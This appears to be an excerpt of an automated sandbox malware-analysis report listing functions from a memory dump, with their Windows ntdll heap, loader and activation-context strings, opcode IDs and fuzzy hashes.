                                                                                                                                                              • Opcode ID: fe1cb36893d0a230160fca8d6a8f841c0d48ddf22c7d527fe8d4cf1dbc0cff91
                                                                                                                                                              • Instruction ID: de785ca07675e1ad6e60e55d737443f205635271bb80076762adc3fee43e0c0d
                                                                                                                                                              • Opcode Fuzzy Hash: fe1cb36893d0a230160fca8d6a8f841c0d48ddf22c7d527fe8d4cf1dbc0cff91
                                                                                                                                                              • Instruction Fuzzy Hash: BFD1A236A00219DFDB25DF98C9C0AADBBFAFF98310F194059E989EB351D3719841CB91
                                                                                                                                                              Function 0192A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                              • Opcode ID: 8f2d2f384c9040f6e941d0a9f9322be9df728f6ef95ec6f998478bb72bdfdb50
                                                                                                                                                              • Instruction ID: 295e381bf8dc5c335f09fda432275a49f95eb1fb666045ce987ad5564573c3d6
                                                                                                                                                              • Opcode Fuzzy Hash: 8f2d2f384c9040f6e941d0a9f9322be9df728f6ef95ec6f998478bb72bdfdb50
                                                                                                                                                              • Instruction Fuzzy Hash: 24C1CD72608392CFD721DF58C144B6AB7E8FF84704F04496AF999CBA55E334CA49CB52
                                                                                                                                                              Function 01958402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 01958591
                                                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0195855E
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01958421
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 01958422
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1918872054
                                                                                                                                                              • Opcode ID: 69b2e1cdf97966f21dc1faa77ee83316d5d1bc3e4424a7bdf48ff5af229425a1
                                                                                                                                                              • Instruction ID: 0b8a4027efa2cfb3e9876b0a99d7baf7a9ec79e9d38f1db8f86ae6633d98a76a
                                                                                                                                                              • Opcode Fuzzy Hash: 69b2e1cdf97966f21dc1faa77ee83316d5d1bc3e4424a7bdf48ff5af229425a1
                                                                                                                                                              • Instruction Fuzzy Hash: 43917E71508345AFE762DF66C840F6BBAECFB84744F40092EFA8892151E734DA45CB62
                                                                                                                                                              Function 01930C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: , xrefs: 019854E0, 019855A1
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 019854D1, 01985592
                                                                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019854ED
                                                                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019855AE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                              • API String ID: 0-1657114761
                                                                                                                                                              • Opcode ID: a2155cebb565b85c03e7b80be94fb10169269f4913b0014e48c4402f5281bc8e
                                                                                                                                                              • Instruction ID: d3ef0acd11181268d5013dd499dbed211ec166455dfbf9ce1e3152e5b3646573
                                                                                                                                                              • Opcode Fuzzy Hash: a2155cebb565b85c03e7b80be94fb10169269f4913b0014e48c4402f5281bc8e
                                                                                                                                                              • Instruction Fuzzy Hash: 07A1F334A0030A9FD725DF28C484BBABBF6BF94300F188569E49E8B746D734E845CB61
                                                                                                                                                              Function 0195273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • .Local, xrefs: 019528D8
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 019921DE
                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019921D9, 019922B1
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019922B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                              • Opcode ID: 3116243cbe8eaf45496f7df416a967993479de41ddca320ed1dae729817854c3
                                                                                                                                                              • Instruction ID: f78dc8872868cbb2fc66482c24210b69526c2a1bbcca5430e48e19ce4c77306d
                                                                                                                                                              • Opcode Fuzzy Hash: 3116243cbe8eaf45496f7df416a967993479de41ddca320ed1dae729817854c3
                                                                                                                                                              • Instruction Fuzzy Hash: F0A1BE35900229DBDB25CF68C994BA9B7B8BF58314F2401E9DD0CAB351D730AE80CF90
                                                                                                                                                              Function 01954AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlDeactivateActivationContext, xrefs: 01993425, 01993432, 01993451
                                                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01993437
                                                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0199342A
                                                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01993456
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                              • API String ID: 0-1245972979
                                                                                                                                                              • Opcode ID: 63a04c9fed0dac0a6ec7019a98453b7bb13a2b834dd21bb0dd812532e46db05d
                                                                                                                                                              • Instruction ID: ce9b867b1aa87a908cd6ed35fcdfb80b92e01ed5439d94c4da9499dd8170c176
                                                                                                                                                              • Opcode Fuzzy Hash: 63a04c9fed0dac0a6ec7019a98453b7bb13a2b834dd21bb0dd812532e46db05d
                                                                                                                                                              • Instruction Fuzzy Hash: BD6124366407129FDB62CF2DC841B6AB7E9BFC0B51F168529EC5DAB240E730E941CB91
                                                                                                                                                              Function 019264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019810AE
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01981028
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01980FE5
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0198106B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                              • API String ID: 0-1468400865
                                                                                                                                                              • Opcode ID: 7ea066ea78b8b7d18bcdf4f876430523f0c828bc3caf09bcbdce9e9da4c885e4
                                                                                                                                                              • Instruction ID: 87c2fe14cef8b42ad090f946c9ea7353f153fc75ad950f838126297f38588cb4
                                                                                                                                                              • Opcode Fuzzy Hash: 7ea066ea78b8b7d18bcdf4f876430523f0c828bc3caf09bcbdce9e9da4c885e4
                                                                                                                                                              • Instruction Fuzzy Hash: 2E71ABB19043159FDB21EF18C884F9B7BACAF95764F440868FD4C8A64AD334D589CBE2
                                                                                                                                                              Function 0194245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0198A992
                                                                                                                                                              • LdrpDynamicShimModule, xrefs: 0198A998
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0198A9A2
                                                                                                                                                              • apphelp.dll, xrefs: 01942462
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-176724104
                                                                                                                                                              • Opcode ID: 992477606965d11f12ba5b3f7b926b1ed7e5f9a82b3fdc2bde3c2433bc58f266
                                                                                                                                                              • Instruction ID: bc168d3eb0993a879533bd0e63839c70b3b4bab88fa36a7afe6711f4c59fdccd
                                                                                                                                                              • Opcode Fuzzy Hash: 992477606965d11f12ba5b3f7b926b1ed7e5f9a82b3fdc2bde3c2433bc58f266
                                                                                                                                                              • Instruction Fuzzy Hash: F7317079A00201EFDB32EF5DD885E6ABBB9FFC4B10F16005AF908A7259D7B45982C740
                                                                                                                                                              Function 019329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: , xrefs: 01933264
                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0193327D
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01933255
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                              • API String ID: 0-617086771
                                                                                                                                                              • Opcode ID: ada9327ed28a47fcd8b294e6e6906c8f35af6739171300b550d65cb1b481d86f
                                                                                                                                                              • Instruction ID: 2263b8c27ce2f3d33211e0634d25916320aa1cd3f7d30a45d4a5414921787a17
                                                                                                                                                              • Opcode Fuzzy Hash: ada9327ed28a47fcd8b294e6e6906c8f35af6739171300b550d65cb1b481d86f
                                                                                                                                                              • Instruction Fuzzy Hash: 7B92BE71E042499FDB25CF68C444BAEBBF5FF88304F188459E85AAB391D734AA45CF50
                                                                                                                                                              Function 019B02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                                                                              • API String ID: 0-1670051934
                                                                                                                                                              • Opcode ID: 45b10e1976b942c8e0e8b66f793822a30210e5b06fc3bd61fee9d2ced2753167
                                                                                                                                                              • Instruction ID: e5982950ff9cbde90c7e9ae206b6ff54dc9bdc3210601c4958c555f3d5856afd
                                                                                                                                                              • Opcode Fuzzy Hash: 45b10e1976b942c8e0e8b66f793822a30210e5b06fc3bd61fee9d2ced2753167
                                                                                                                                                              • Instruction Fuzzy Hash: 7B225D72A047028FD724CF2DCA95A6BBBF5BBC4211F188A2EF2DE87650D771E5448B41
                                                                                                                                                              Function 01930770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                              • Opcode ID: 06caf4823422a07489a170cfe05d53a012a80036db9cc709986192dd98c2c622
                                                                                                                                                              • Instruction ID: d596229fc8f65af92ca0d801ae71ad85ce1a7eb8f95198049192b483b7be6b38
                                                                                                                                                              • Opcode Fuzzy Hash: 06caf4823422a07489a170cfe05d53a012a80036db9cc709986192dd98c2c622
                                                                                                                                                              • Instruction Fuzzy Hash: 57F1B030600606DFEB26DF68C894F6AB7F9FF84704F188568E51A9B381D734E985CB91
                                                                                                                                                              Function 01921460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01921728
                                                                                                                                                              • HEAP: , xrefs: 01921596
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01921712
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                              • Opcode ID: cae297ac823f9aa9f89a38ce1bd4f1aba7223e28b390c0967a4e9a415170aa92
                                                                                                                                                              • Instruction ID: d766ec7a602e7559bc5a0bf31550c3f67ba6144184d31ceb0b0372b44b02d937
                                                                                                                                                              • Opcode Fuzzy Hash: cae297ac823f9aa9f89a38ce1bd4f1aba7223e28b390c0967a4e9a415170aa92
                                                                                                                                                              • Instruction Fuzzy Hash: 87E10530A042559FDB29CF2CC451B7ABBF5EF88304F18886DE59ACB24AD734E950CB50
                                                                                                                                                              Function 01946962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $@
                                                                                                                                                              • API String ID: 0-1077428164
                                                                                                                                                              • Opcode ID: 59f3e96fac97cccdb6c23c4c30323a2151996e33c1d0c4123e1af2e5986ae267
                                                                                                                                                              • Instruction ID: b4dfce344fa4ffd7bca4fc37a81cd73a4a25dfe46c90aae3892eda59b3d8ae2e
                                                                                                                                                              • Opcode Fuzzy Hash: 59f3e96fac97cccdb6c23c4c30323a2151996e33c1d0c4123e1af2e5986ae267
                                                                                                                                                              • Instruction Fuzzy Hash: 11C27F716083459FE729CF68C881FABBBE9AFC9754F04892DE98D87241D734D805CB62
                                                                                                                                                              Function 0191A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                              • Opcode ID: 4e280f3d210a0cdcbf61e4acdc2d501afeebff9a3a68fa55d781dc85dadd6e62
                                                                                                                                                              • Instruction ID: 2a8999e040692932d369e8460a578ec4ac3d5a32533cc23cf7a6656bb6275088
                                                                                                                                                              • Opcode Fuzzy Hash: 4e280f3d210a0cdcbf61e4acdc2d501afeebff9a3a68fa55d781dc85dadd6e62
                                                                                                                                                              • Instruction Fuzzy Hash: F1A14C7191162A9BDB31DF68CC88BEAB7B8EF44711F1005EAEA0DA7250D7359E84CF50
                                                                                                                                                              Function 01940BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0198A10F
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0198A121
                                                                                                                                                              • LdrpCheckModule, xrefs: 0198A117
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-161242083
                                                                                                                                                              • Opcode ID: 07fc91a1d0241e9256770ff7c7fc766f48e9aa1076acc6166339c14f8a41116c
                                                                                                                                                              • Instruction ID: c0a087d71ac21cc61e6057796cc6317fc9d03c5fdf5b5638bbf2b5cba73fb47a
                                                                                                                                                              • Opcode Fuzzy Hash: 07fc91a1d0241e9256770ff7c7fc766f48e9aa1076acc6166339c14f8a41116c
                                                                                                                                                              • Instruction Fuzzy Hash: 3971D474E00205DFDB25EF68C940EAEB7F8FB88305F18446DE90ADB255E774A942CB54
                                                                                                                                                              Function 01930A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-1334570610
                                                                                                                                                              • Opcode ID: ddbae10d99e7f06172912cf1dbe0acd4524e8c58be143becab8a254865713e30
                                                                                                                                                              • Instruction ID: 696c5927adca638da172add30f76d0680b46f2cec3b45c0ab62f04d840ddeab0
                                                                                                                                                              • Opcode Fuzzy Hash: ddbae10d99e7f06172912cf1dbe0acd4524e8c58be143becab8a254865713e30
                                                                                                                                                              • Instruction Fuzzy Hash: 8461AD30600306DFEB29DF28C484B6ABBF6FF85704F18855AE45D8B296D770E881CB91
                                                                                                                                                              Function 0195C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019982E8
                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 019982DE
                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 019982D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                              • Opcode ID: 35fb929a9492faacc59cd3ced9d6a3571295627755b281b2e63a8a7097d9dfb5
                                                                                                                                                              • Instruction ID: 76487882c84e6f21c34d81e8df5588e95dda11b0a8a2a7547e910d475216a934
                                                                                                                                                              • Opcode Fuzzy Hash: 35fb929a9492faacc59cd3ced9d6a3571295627755b281b2e63a8a7097d9dfb5
                                                                                                                                                              • Instruction Fuzzy Hash: 92410F7A504305ABCB21EB68D844F5B7BECEF89B50F00492AF94CE3294E770E801CB91
                                                                                                                                                              Function 019DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019DC1C5
                                                                                                                                                              • @, xrefs: 019DC1F1
                                                                                                                                                              • PreferredUILanguages, xrefs: 019DC212
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                              • Opcode ID: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                                                                                              • Instruction ID: 57cdd234a5f477832a1b32e4620ec0564ddd32881005e953f59f40dd03cfa513
                                                                                                                                                              • Opcode Fuzzy Hash: 45189ca0c02d6fe248abe4c30dec879b29572b4e9f9f22cc428f3efe1dfebf98
                                                                                                                                                              • Instruction Fuzzy Hash: 18414171E00209EBEB11DBD8C891FEEBBBDAB54741F14816EE60DA7244D774DA44CB60
                                                                                                                                                              Function 019B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                              • Opcode ID: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                                                                                              • Instruction ID: 9c681878c66acf6ff3dc472ed3d824e888125aef252cf01e48617701546e37dc
                                                                                                                                                              • Opcode Fuzzy Hash: 2118807f3bb7fa51df48c89b763be024ce3555dbc72045d02dc6ac2611135727
                                                                                                                                                              • Instruction Fuzzy Hash: 40410731D006588FEB26DBD9CA84BEDBBB8FFA5340F140469D90AEB792D7349901DB50
                                                                                                                                                              Function 019A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 019A4899
                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019A4888
                                                                                                                                                              • LdrpCheckRedirection, xrefs: 019A488F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                              • Opcode ID: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                                                                                              • Instruction ID: 6c7ae7c26651739b2eae2b4c3ebed81e6ec3e7ec7170401b2481fef2c16df7e2
                                                                                                                                                              • Opcode Fuzzy Hash: d02741d3d2af9bcfacbdd62bb494cd931a7275062122eb30a5b3e2e33fae7307
                                                                                                                                                              • Instruction Fuzzy Hash: 0D41D636A042919FCB21CE5CE840E267BE9EF89A51B8D056DED4DD7311D7B0D804CBD2
                                                                                                                                                              Function 01930BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2558761708
                                                                                                                                                              • Opcode ID: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                                                                                              • Instruction ID: 49281c83a7be52c0e05a1e673784efc2bf6fe721c643a66c8339fb5ed54d68c5
                                                                                                                                                              • Opcode Fuzzy Hash: 2499103d31ef662dbb8c49d386c36311f7969319515172962d3105cab7d520a0
                                                                                                                                                              • Instruction Fuzzy Hash: 5E11DF313151069FEB29EA28C481F76B3BAEF80B1AF19852DF40ECB255DB30D885C750
                                                                                                                                                              Function 019A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
